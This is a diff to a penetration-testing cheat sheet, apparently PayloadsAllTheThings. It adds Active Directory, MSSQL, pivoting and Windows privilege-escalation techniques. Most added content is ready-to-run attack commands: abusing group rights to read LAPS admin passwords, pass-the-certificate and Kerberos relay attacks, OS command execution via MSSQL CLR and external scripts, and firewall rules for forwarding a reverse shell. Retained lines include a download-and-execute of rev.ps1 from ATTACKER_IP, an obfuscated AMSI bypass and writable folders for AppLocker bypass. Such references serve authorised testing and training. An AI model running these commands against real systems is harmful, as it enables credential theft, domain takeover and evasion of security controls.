LAPS Access + Pass the Cert + Writeable folder

Methodology and Resources/Active Directory Attack.md

@@ -82,6 +82,7 @@
       - [ESC7 - Vulnerable Certificate Authority Access Control](#esc7---vulnerable-certificate-authority-access-control)
       - [ESC8 - AD CS Relay Attack](#esc8---ad-cs-relay-attack)
       - [Certifried CVE-2022-26923](#certifried-cve-2022-26923)
+      - [Pass-The-Certificate](#pass-the-certificate)
     - [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
     - [Abusing Active Directory ACLs/ACEs](#abusing-active-directory-aclsaces)
       - [GenericAll](#genericall)
@@ -230,13 +231,13 @@ Use the correct collector
   # run the collector on the machine using SharpHound.exe
   # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
   # /usr/lib/bloodhound/resources/app/Collectors/SharpHound.exe
-  .\SharpHound.exe -c all -d active.htb -SearchForest
-  .\SharpHound.exe --EncryptZip --ZipFilename export.zip
-  .\SharpHound.exe -c all,GPOLocalGroup
+  .\SharpHound.exe -c all -d active.htb --searchforest
+  .\SharpHound.exe -c all,GPOLocalGroup # all collection doesn't include GPOLocalGroup by default
+  .\SharpHound.exe --CollectionMethod DCOnly # only collect from the DC, doesn't query the computers (more stealthy)
+
   .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --JSONFolder <PathToFile>
-  .\SharpHound.exe -c all -d active.htb --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100
+  .\SharpHound.exe -c all --LdapUsername <UserName> --LdapPassword <Password> --domaincontroller 10.10.10.100 -d active.htb
   .\SharpHound.exe -c all,GPOLocalGroup --outputdirectory C:\Windows\Temp --randomizefilenames --prettyjson --nosavecache --encryptzip --collectallproperties --throttle 10000 --jitter 23
-  .\SharpHound.exe -c all,GPOLocalGroup --searchforest
 
   # or run the collector on the machine using Powershell
   # https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
@@ -1467,6 +1468,14 @@ Get-AuthenticodeSignature 'c:\program files\LAPS\CSE\Admpwd.dll'
       ldapsearch -x -h  -D "@" -w  -b "dc=<>,dc=<>,dc=<>" "(&(objectCategory=computer)(ms-MCS-AdmPwd=*))" ms-MCS-AdmPwd`
       ```
 
+#### Grant LAPS Access
+The members of the group **"Account Operator"** can add and modify all the non admin users and groups. Since **LAPS ADM** and **LAPS READ** are considered as non admin groups, it's possible to add an user to them, and read the LAPS admin password
+
+```ps1
+Add-DomainGroupMember -Identity 'LAPS ADM' -Members 'user1' -Credential $cred -Domain "domain.local"
+Add-DomainGroupMember -Identity 'LAPS READ' -Members 'user1' -Credential $cred -Domain "domain.local"
+```
+
 
 ### Reading GMSA Password
 
@@ -2230,7 +2239,9 @@ secretsdump.py -k -no-pass target.lab.local
 
 ### Active Directory Certificate Services
 
-* Find ADCS Server : `crackmapexec ldap domain.lab -u username -p password -M adcs`
+* Find ADCS Server
+  * `crackmapexec ldap domain.lab -u username -p password -M adcs`
+  * `ldapsearch -H ldap://dc_IP -x -LLL -D 'CN=<user>,OU=Users,DC=domain,DC=local' -w '<password>' -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local" dNSHostName`
 * Enumerate AD Enterprise CAs with certutil: `certutil.exe -config - -ping`
 
 #### ESC1 - Misconfigured Certificate Templates
@@ -2247,8 +2258,10 @@ Exploitation:
     ```ps1
     Certify.exe find /vulnerable
     Certify.exe find /vulnerable /currentuser
-    or
+    # or
     PS> Get-ADObject -LDAPFilter '(&(objectclass=pkicertificatetemplate)(!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))(|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))(|(pkiextendedkeyusage=1.3.6.1.4.1.311.20.2.2)(pkiextendedkeyusage=1.3.6.1.5.5.7.3.2) (pkiextendedkeyusage=1.3.6.1.5.2.3.4))(mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1))' -SearchBase 'CN=Configuration,DC=lab,DC=local'
+    # or
+    certipy 'domain.local'/'user':'password'@'domaincontroller' find -bloodhound
     ```
 * Use Certify, [Certi](https://github.com/eloypgz/certi) or [Certipy](https://github.com/ly4k/Certipy) to request a Certificate and add an alternative name (user to impersonate)
     ```ps1
@@ -2394,7 +2407,7 @@ Certify.exe writefile /ca:SERVER\ca-name /path:\\remote.server\share\shell.php /
 
 Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101)
 
-* Version 1: NTLM Relay + Rubeus + PetitPotam
+* **Version 1**: NTLM Relay + Rubeus + PetitPotam
   ```powershell
   impacket> python3 ntlmrelayx.py -t http://<ca-server>/certsrv/certfnsh.asp -smb2support --adcs
   impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template VulnTemplate
@@ -2417,7 +2430,7 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
   mimikatz> lsadump::dcsync /user:krbtgt
   ```
 
-* Version 2: NTLM Relay + Mimikatz + Kekeo
+* **Version 2**: NTLM Relay + Mimikatz + Kekeo
   ```powershell
   impacket> python3 ./examples/ntlmrelayx.py -t http://10.10.10.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
 
@@ -2431,7 +2444,17 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
   # Mimikatz
   mimikatz> lsadump::dcsync /user:krbtgt
   ```
-* Version 3: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
+
+* **Version 3**: Kerberos Relay
+  ```ps1
+  # Setup the relay
+  sudo krbrelayx.py --target http://CA/certsrv -ip attacker_IP --victim target.domain.local --adcs --template Machine
+
+  # Run mitm6
+  sudo mitm6 --domain domain.local --host-allowlist target.domain.local --relay CA.domain.local -v
+  ```
+
+* **Version 4**: ADCSPwn - Require `WebClient` service running on the domain controller. By default this service is not installed.
   ```powershell
   https://github.com/bats3c/ADCSPwn
   adcspwn.exe --adcs <cs server> --port [local port] --remote [computer]
@@ -2451,7 +2474,8 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
   unc             -       Set custom UNC callback path for EfsRpcOpenFileRaw (Petitpotam) .
   output          -       Output path to store base64 generated crt.
   ```
-* Version 4: Certipy ESC8
+
+* **Version 5**: Certipy ESC8
   ```ps1
   certipy relay -ca 172.16.19.100
   ```
@@ -2496,6 +2520,29 @@ Require [Impacket PR #1101](https://github.com/SecureAuthCorp/impacket/pull/1101
   ```
 
 
+#### Pass-The-Certificate
+
+* Windows
+  ```ps1
+  # Information about a cert file
+  certutil -v -dump admin.pfx
+
+  # From a Base64 PFX
+  Rubeus.exe asktgt /user:"TARGET_SAMNAME" /certificate:cert.pfx /password:"CERTIFICATE_PASSWORD" /domain:"FQDN_DOMAIN" /dc:"DOMAIN_CONTROLLER" /show
+  ```
+* Linux
+  ```ps1
+  # Base64-encoded PFX certificate (string) (password can be set)
+  gettgtpkinit.py -pfx-base64 $(cat "PATH_TO_B64_PFX_CERT") "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+  ​
+  # PEM certificate (file) + PEM private key (file)
+  gettgtpkinit.py -cert-pem "PATH_TO_PEM_CERT" -key-pem "PATH_TO_PEM_KEY" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+
+  # PFX certificate (file) + password (string, optionnal)
+  gettgtpkinit.py -cert-pfx "PATH_TO_PFX_CERT" -pfx-pass "CERT_PASSWORD" "FQDN_DOMAIN/TARGET_SAMNAME" "TGT_CCACHE_FILE"
+  ```
+
+
 ### Dangerous Built-in Groups Usage
 
 If you do not want modified ACLs to be overwritten every hour, you should change ACL template on the object `CN=AdminSDHolder,CN=System` or set `"dminCount` attribute to `0` for the required object.
@@ -2516,6 +2563,7 @@ Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)"
 ([adsisearcher]"(AdminCount=1)").findall()
 ```
 
+
 #### AdminSDHolder Abuse
 
 > The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins.

Methodology and Resources/Cloud - Azure Pentest.md

@@ -3,6 +3,7 @@
 ## Summary
 
 * [Azure Recon Tools](#azure-recon-tools)
+* [Terminology](#terminology)
 * [Enumeration](#enumeration)
     * [Enumerate valid emails](#enumerate-valid-emails)
     * [Enumerate Azure Subdomains](#enumerate-azure-subdomains)
@@ -180,6 +181,16 @@
     $ Create-Backdoor, Execute-Backdoor
     ```
 
+## Terminology
+
+> Basic Azure AD terminologies
+
+* **Tenant**: An instance of Azure AD and represents a single organization.
+* **Azure AD Directory**: Each tenant has a dedicated Directory. This is used to perform identity and access management functions for resources.
+* **Subscriptions**: It is used to pay for services. There can be multiple subscriptions in a Directory.
+* **Core Domain**: The initial domain name <tenant>.onmicrosoft.com is the core domain. It is possible to define custom domain names too.
+    
+
 ## Enumeration
 
 ### Enumerate valid emails
@@ -1116,3 +1127,4 @@ Using [https://autologon.microsoftazuread-sso.com/](https://autologon.microsofta
 * [AZURE AD INTRODUCTION FOR RED TEAMERS - Written by Aymeric Palhière (bak) - 2020-04-20](https://www.synacktiv.com/posts/pentest/azure-ad-introduction-for-red-teamers.html)
 * [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/)
 * [The Art of the Device Code Phish - Bobby Cooke](https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html)
+* [AZURE AD cheatsheet - BlackWasp](https://hideandsec.sh/books/cheatsheets-82c/page/azure-ad)

Methodology and Resources/Escape Breakout.md

@@ -146,3 +146,4 @@ firefox irc://127.0.0.1 -P "Test"
 * [PentestPartners - Breaking out of Citrix and other restricted desktop environments](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
 * [Breaking Out! of Applications Deployed via Terminal Services, Citrix, and Kiosks - Scott Sutherland - May 22nd, 2013](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
 * [Escaping from KIOSKs - HackTricks](https://book.hacktricks.xyz/physical-attacks/escaping-from-gui-applications)
+* [Breaking out of Windows Kiosks using only Microsoft Edge - Firat Acar - May 24, 2022](https://blog.nviso.eu/2022/05/24/breaking-out-of-windows-kiosks-using-only-microsoft-edge/)

Methodology and Resources/MSSQL Server - Cheatsheet.md

@@ -163,12 +163,14 @@ A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results
 
 ```ps1
 Get-SQLInstanceDomain | Get-SQLServerLink -Verbose
+select * from master..sysservers
 ```
 
 ### Crawl Links for a Specific Instance
 
 ```ps1
 Get-SQLServerLinkCrawl -Instance "<DBSERVERNAME\DBInstance>" -Verbose
+select * from openquery("<instance>",'select * from openquery("<instance2>",''select * from master..sysservers'')')
 ```
 
 ### Query Version of Linked Database
@@ -286,12 +288,21 @@ Prerequisites:
 * CREATE ASSEMBLY permission (or)
 * ALTER ASSEMBLY permission (or)
 
+The execution takes place with privileges of the **service account**.
+
 ### Execute commands using CLR assembly
 
 ```ps1
+# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string
+Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop
+
+# Execute command using CLR assembly
+Invoke-SQLOSCmdCLR -Username sa -Password <password> -Instance <instance> -Command "whoami" -Verbose
 Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "whoami" Verbose
-or
 Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64>" -Verbose
+
+# List all the stored procedures added using CLR
+Get-SQLStoredProcedureCLR -Instance <instance> -Verbose
 ```
 
 ### Manually creating a CLR DLL and importing it
@@ -385,6 +396,7 @@ GO
 ## OLE Automation
 
 * :warning: Disabled by default
+* The execution takes place with privileges of the **service account**.
 
 ### Execute commands using OLE automation procedures
 
@@ -418,6 +430,9 @@ SQL> upload reciclador.dll C:\windows\temp\reciclador.dll
 
 ## Agent Jobs
 
+* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured.
+* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job.
+
 ### Execute commands through SQL Agent Job service
 
 ```ps1
@@ -461,12 +476,21 @@ RECONFIGURE;
 
 ```ps1
 Invoke-SQLOSCmdPython -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
+
+EXEC sp_execute_external_script @language =N'Python',@script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
+WITH RESULT SETS (([cmd_out] nvarchar(max)))
 ```
 
 ## R
 
 ```ps1
 Invoke-SQLOSCmdR -Username sa -Password Password1234 -Instance "<DBSERVERNAME\DBInstance>" -Command "powershell -e <base64encodedscript>" -Verbose
+
+EXEC sp_execute_external_script @language=N'R',@script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))'
+WITH RESULT SETS (([cmd_out] text));
+GO
+
+@script=N'OutputDataSet <-data.frame(shell("dir",intern=T))'
 ```
 
 ## Audit Checks
@@ -491,8 +515,10 @@ powerpick Get-SQLQuery -Instance "<DBSERVERNAME\DBInstance>" -Query "EXECUTE AS
 
 ## Find databases that have been configured as trustworthy
 
-```ps1
+```sql
 Invoke-SQLAuditPrivTrustworthy -Instance "<DBSERVERNAME\DBInstance>" -Exploit -Verbose 
+
+SELECT name as database_name, SUSER_NAME(owner_sid) AS database_owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases
 ```
 
 > The following audit checks run web requests to load Inveigh via reflection. Be mindful of the environment and ability to connect outbound.

Methodology and Resources/Network Pivoting Techniques.md

@@ -30,8 +30,17 @@
 
 ```powershell
 netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport
-
 netsh interface portproxy add v4tov4 listenport=3340 listenaddress=10.1.1.110 connectport=3389 connectaddress=10.1.1.110
+
+# Forward the port 4545 for the reverse shell, and the 80 for the http server for example
+netsh interface portproxy add v4tov4 listenport=4545 connectaddress=192.168.50.44 connectport=4545
+netsh interface portproxy add v4tov4 listenport=80 connectaddress=192.168.50.44 connectport=80
+# Correctly open the port on the machine
+netsh advfirewall firewall add rule name="PortForwarding 80" dir=in action=allow protocol=TCP localport=80
+netsh advfirewall firewall add rule name="PortForwarding 80" dir=out action=allow protocol=TCP localport=80
+netsh advfirewall firewall add rule name="PortForwarding 4545" dir=in action=allow protocol=TCP localport=4545
+netsh advfirewall firewall add rule name="PortForwarding 4545" dir=out action=allow protocol=TCP localport=4545
+
 ```
 
 1. listenaddress – is a local IP address waiting for a connection.
@@ -446,3 +455,4 @@ tar xvzf cloudflared-stable-linux-amd64.tgz
 * [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
 * [Etat de l’art du pivoting réseau en 2019 - Oct 28,2019 - Alexandre Zanni](https://cyberdefense.orange.com/fr/blog/etat-de-lart-du-pivoting-reseau-en-2019/)
 * [Red Team: Using SharpChisel to exfil internal network - Shantanu Khandelwal - Jun 8](https://medium.com/@shantanukhande/red-team-using-sharpchisel-to-exfil-internal-network-e1b07ed9b49)
+* [Active Directory - hideandsec](https://hideandsec.sh/books/cheatsheets-82c/page/active-directory)

Methodology and Resources/Windows - Privilege Escalation.md

@@ -315,15 +315,15 @@ netsh Advfirewall set allprofiles state off
 ### AppLocker Enumeration
 
 - With the GPO
-- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
-
+- `HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2` (Keys: Appx, Dll, Exe, Msi and Script).
 
 * List AppLocker rules
     ```powershell
     PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
     ```
 
-* Applocker Bypass
+* AppLocker Bypass
+    * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users
     * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md
     * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md
     * https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md
@@ -337,23 +337,20 @@ C:\windows\syswow64\windowspowershell\v1.0\powershell
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell
 ```
 
-Powershell Constrained Mode
+#### Powershell Constrained Mode
 
+* Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode`
+* [bypass-clm - PowerShell Constrained Language Mode Bypass](https://github.com/calebstewart/bypass-clm)
+* [PowerShdll - Powershell with no Powershell.exe via DLL's](https://github.com/p3nt4/PowerShdll): `rundll32.exe C:\temp\PowerShdll.dll,main`
+* Other bypasses
     ```powershell
-# Check if we are in a constrained mode
-$ExecutionContext.SessionState.LanguageMode
-
     PS > &{ whoami }
     powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')"
-
-# PowerShDLL - Powershell with no Powershell.exe via DLL’s
-# https://github.com/p3nt4/PowerShdll
-ftp> rundll32.exe C:\temp\PowerShdll.dll,main
     ```
 
+#### AMSI Bypass
 
-
-Example of AMSI Bypass.
+Find more AMSI bypass: [here](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md)
 
 ```powershell
 PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@@ -365,10 +362,22 @@ PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetF
 ```powershell
 C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
 C:\Windows\System32\spool\drivers\color
-C:\Windows\Tasks
+C:\Windows\System32\spool\printers
+C:\Windows\System32\spool\servers
 C:\Windows\tracing
 C:\Windows\Temp
 C:\Users\Public
+C:\Windows\Tasks
+C:\Windows\System32\tasks
+C:\Windows\SysWOW64\tasks
+C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system
+C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system
+C:\Windows\debug\wia
+C:\Windows\registration\crmlog
+C:\Windows\System32\com\dmp
+C:\Windows\SysWOW64\com\dmp
+C:\Windows\System32\fxstmp
+C:\Windows\SysWOW64\fxstmp
 ```
 
 ## EoP - Looting for passwords